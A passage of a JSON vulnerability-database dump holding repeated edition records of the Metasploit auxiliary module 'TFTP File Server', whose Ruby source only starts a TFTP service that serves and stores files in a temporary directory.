"metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-23T01:37:31", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2018-08-23T01:37:31", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-27T19:48:52", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2018-08-27T19:48:52", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-28T03:38:37", "history": [], "viewCount": 11, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2018-08-28T03:38:37", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-06T22:07:28", "history": [], "viewCount": 11, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2018-09-06T22:07:28", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "b8fe7c8a3e2750eaf39bc6a3b3e1991f", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-07T03:52:43", "history": [], "viewCount": 41, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "carbonblack", "idList": ["CARBONBLACK:B027EA436203BDA814C4EA51081F6A87", "CARBONBLACK:89E99C6BF8DD5C2DDE08ED61C12701BF"]}, {"type": "avleonov", "idList": ["AVLEONOV:3A8521BFB3F8C5B46C04F0C82A0F2DC1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1671-1:EBBBE", "DEBIAN:DLA-1666-1:43CD3", "DEBIAN:DSA-4387-1:19CD5"]}, {"type": "talosblog", "idList": ["TALOSBLOG:D1788B89D8B17C5C6DB6F32CC37734F7"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:8842738F7C86C87FD607E515176F88C8"]}, {"type": "exploitdb", "idList": ["EDB-ID:46342"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891666", "OPENVAS:1361412562310107540", "OPENVAS:1361412562310107541", "OPENVAS:1361412562310704387"]}, {"type": "kitploit", "idList": ["KITPLOIT:9165290622393060450", "KITPLOIT:7455761002232864942"]}, {"type": "centos", "idList": ["CESA-2019:0231", "CESA-2019:0232"]}, {"type": "cve", "idList": ["CVE-2019-7659", "CVE-2019-1676"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:0153-1"]}], "modified": "2018-09-07T03:52:43"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2018-09-07T03:52:43", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "5ddba22023fc905a1684e57cd9307977", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-02T19:16:21", "history": [], "viewCount": 41, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1105-1", "OPENSUSE-SU-2019:1111-1", "OPENSUSE-SU-2019:1113-1"]}, {"type": "thn", "idList": ["THN:BD4668D0C2864A2575DE9C758747F0D4", "THN:11AD5537975A6BED16F7C2DFCC323403"]}, {"type": "krebs", "idList": ["KREBS:5D0C14948096E7152BBBFD7B231BB43A"]}, {"type": "threatpost", "idList": ["THREATPOST:EF36042DBE4BC724DB5EBFD76D1D6712"]}, {"type": "ubuntu", "idList": ["USN-3929-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:46638", "EDB-ID:46632"]}, {"type": "gentoo", "idList": ["GLSA-201904-08"]}, {"type": "zdt", "idList": ["1337DAY-ID-32465"]}, {"type": "kitploit", "idList": ["KITPLOIT:6038992159381141666", "KITPLOIT:6159129042388094301"]}, {"type": "cve", "idList": ["CVE-2019-3792", "CVE-2019-3489", "CVE-2019-3876", "CVE-2017-16775"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:322837E9F552129B2CBD8F0F85D540B7"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:4599FE395AEA942F1650F4A831514DC0"]}], "modified": "2019-04-02T19:16:21"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2019-04-02T19:16:21", "differentElements": ["modified", "published"], "edition": 16}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "b8fe7c8a3e2750eaf39bc6a3b3e1991f", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-03T00:59:47", "history": [], "viewCount": 41, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1123-1", "OPENSUSE-SU-2019:1105-1", "OPENSUSE-SU-2019:1111-1", "OPENSUSE-SU-2019:1113-1"]}, {"type": "thn", "idList": ["THN:BD4668D0C2864A2575DE9C758747F0D4", "THN:11AD5537975A6BED16F7C2DFCC323403"]}, {"type": "threatpost", "idList": ["THREATPOST:5C6E52ADEECE22E57417EB4A24FEA4F5", "THREATPOST:EF36042DBE4BC724DB5EBFD76D1D6712"]}, {"type": "krebs", "idList": ["KREBS:5D0C14948096E7152BBBFD7B231BB43A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32464", "1337DAY-ID-32465", "1337DAY-ID-32472"]}, {"type": "ubuntu", "idList": ["USN-3929-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:46638", "EDB-ID:46632"]}, {"type": "gentoo", "idList": ["GLSA-201904-08"]}, {"type": "kitploit", "idList": ["KITPLOIT:6038992159381141666"]}, {"type": "cve", "idList": ["CVE-2019-3792", "CVE-2019-3489"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:322837E9F552129B2CBD8F0F85D540B7"]}], "modified": "2019-04-03T00:59:47"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/server/tftp.rb"}, "lastseen": "2019-04-03T00:59:47", "differentElements": ["description", "metasploitHistory", "metasploitReliability", "sourceHref"], "edition": 17}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-05-28T21:05:07", "history": [], "viewCount": 41, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:4F23E34A058045723339C103BC41A3D1"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32808", "1337DAY-ID-32803", "1337DAY-ID-32802"]}, {"type": "ics", "idList": ["ICSA-19-148-01"]}, {"type": "kitploit", "idList": ["KITPLOIT:6667106287137702443", "KITPLOIT:7385682645190270858"]}, {"type": "redhat", "idList": ["RHSA-2019:1279", "RHSA-2019:1278"]}, {"type": "ubuntu", "idList": ["USN-3976-4", "USN-3976-3"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891804", "OPENVAS:1361412562310704450", "OPENVAS:1361412562310891801"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1804-1:03BE3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994264", "MYHACK58:62201994259"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:F88308F949790492EC48E2CDD8DBAA16"]}], "modified": "2019-05-28T21:05:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-28T21:05:07", "differentElements": ["modified", "published"], "edition": 18}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "0b947ee7951ab35799a0e49641135d17", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-03T14:03:56", "history": [], "viewCount": 41, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:4F23E34A058045723339C103BC41A3D1"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32808", "1337DAY-ID-32803", "1337DAY-ID-32802"]}, {"type": "ics", "idList": ["ICSA-19-148-01"]}, {"type": "kitploit", "idList": ["KITPLOIT:6667106287137702443", "KITPLOIT:7385682645190270858"]}, {"type": "redhat", "idList": ["RHSA-2019:1279", "RHSA-2019:1278"]}, {"type": "ubuntu", "idList": ["USN-3976-4", "USN-3976-3"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891804", "OPENVAS:1361412562310704450", "OPENVAS:1361412562310891801"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1804-1:03BE3"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994264", "MYHACK58:62201994259"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:F88308F949790492EC48E2CDD8DBAA16"]}], "modified": "2019-05-28T21:05:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on 